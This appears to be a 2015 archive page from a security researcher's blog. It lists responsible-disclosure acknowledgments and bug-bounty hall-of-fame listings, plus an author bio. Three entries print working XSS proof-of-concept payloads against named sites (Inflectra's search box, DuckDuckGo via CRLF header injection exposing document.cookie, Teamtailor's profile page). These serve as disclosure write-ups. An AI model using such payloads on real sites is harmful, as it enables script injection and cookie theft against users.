Pentest Space: 2015

Saturday 5 December 2015

Listed in ROCeteer Security Researcher Hall of fame

ROCeteer Team appreciated the reporting security vulnerability.

Check here -> https://roceteer.com/security

Monday 16 November 2015

Acknowledged by ODOO

odoo Security Team acknowledged me for reporting security vulnerability.

Check here -> https://www.odoo.com/page/responsible-disclosure

Monday 26 October 2015

Listed Security Hall of fame at Okcupid

Got reputation points @okcupid @hackerone

check here -> https://hackerone.com/okcupid/thanks/2015

Sunday 4 October 2015

Inflectra Security Hall of fame

Vulnerability: Reflected Cross Site Scripting XSS
Vuln URL: http://www.inflectra.com/Support/KnowledgeBase/List.aspx

Steps:

1. Browse URL -> http://www.inflectra.com/Support/KnowledgeBase/List.aspx

2. Input following payload script to search box

"><img src=: '"><img src=a onerror=prompt(document.domain);>

Inflectra Team acknowledged me for disclosing security issues to them.

Check here -> https://www.inflectra.com/company/responsible-disclosure.aspx

Sunday 20 September 2015

Acknowledgement + SWAG by Duck Duck Go

Vulnerability: Reflected Cross Site Scripting XSS
Vuln function: Search box

Payload: ref:xxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr

Got Acknowledgement + SWAG by Duck Duck Go for reporting security vulnerability. :)

Monday 14 September 2015

Listed Security Hall of Fame at Teamtailor.

1) Vulnerability Name:

XSS: Cross Site Scripting Vulnerabilities

2) Vulnerability Point:

Inset video tag at User Profile edit page. ( https://www.teamtailor.com/profile/edit )

3) Payload:

"/><svg/onload=prompt("//XSS-By-Ye//")>

Hall of fame: https://resources.teamtailor.com/vulnerability

Sunday 9 August 2015

Acknowledgement + SWAG by Segment

Segment provided Acknowledgment + SWAG for reporting security vulnerability.

unfortunately, i didn't receive swag coz of shipping error. :'(

Monday 3 August 2015

Listed Security Hall of Fame at OWASP Academy

Ref: http://www.owaspacademy.com/security

Sunday 2 August 2015

Acknowledgement by ESET

ESET provided acknowledgement to me for reporting security vulnerability.

Also provided this <3 swag too :)

Monday 27 July 2015

Listed Security Hall of Fame at Constant Contact

Ref: http://www.constantcontact.com/legal/report-vulnerability

Sunday 28 June 2015

Acknowledgement by ZenGuard

Received acknowledgement and 3 month Free Premium VPN as reward for reporting security vulnerability.

About Me

Ye Yint aka r0lan has always had a strong fascination with InfoSec. He is one bit of YEHG core team and also a former technical team member of mmCERT. He has participated in responsible disclosure programs and attained some Hall of Fames and CVEs. Currently, he has obtained OSCE, eCPTX, AWAE, OSCP, OSWP, CREST CRT and CPSA and has occasionally contributed back to the community such as BSides Myanmar and Myanmar Cyber Security Challenge CTF competition as one of the organisers.
Linkedin , Github , Twitter